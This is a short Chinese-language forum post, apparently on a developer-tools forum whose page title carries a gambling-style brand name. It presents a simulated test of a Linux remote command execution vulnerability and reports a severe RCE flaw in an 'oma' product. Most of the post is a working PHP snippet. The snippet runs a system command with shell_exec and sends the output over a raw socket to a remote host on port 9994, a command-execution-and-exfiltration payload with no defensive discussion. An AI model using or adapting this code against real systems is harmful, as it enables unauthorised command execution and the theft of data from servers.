linux远程系统命令执行漏洞模拟测试 | 开发者工具论坛-金年会app官方网


// 1. 执行 ls -la 命令并捕获输出
//$output = shell_exec('ls -la');
$output = shell_exec('whoami');
// 2. 检查输出是否为空
if (empty($output)) {
    die("没有输出");
}
// 3. 连接到远程服务器的端口9994
$remotehost = '192.168.212.123';
$remoteport = 9994;
$socket = fsockopen($remotehost, $remoteport, $errno, $errstr, 30);
if (!$socket) {
    echo "连接失败: $errstr ($errno)
\n"
; } else { // 假设远程服务期望接收纯文本,我们直接发送输出 fwrite($socket, $output); // 你可以在这里添加额外的逻辑来读取远程服务的响应(如果需要) // ... // 关闭连接 fclose($socket); echo "输出已发送到远程服务器"; }

oma产品存在严重的远程系统命令执行漏洞

本作品采用《cc 协议》,转载必须注明作者和本文链接
missyou-coding
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!
网站地图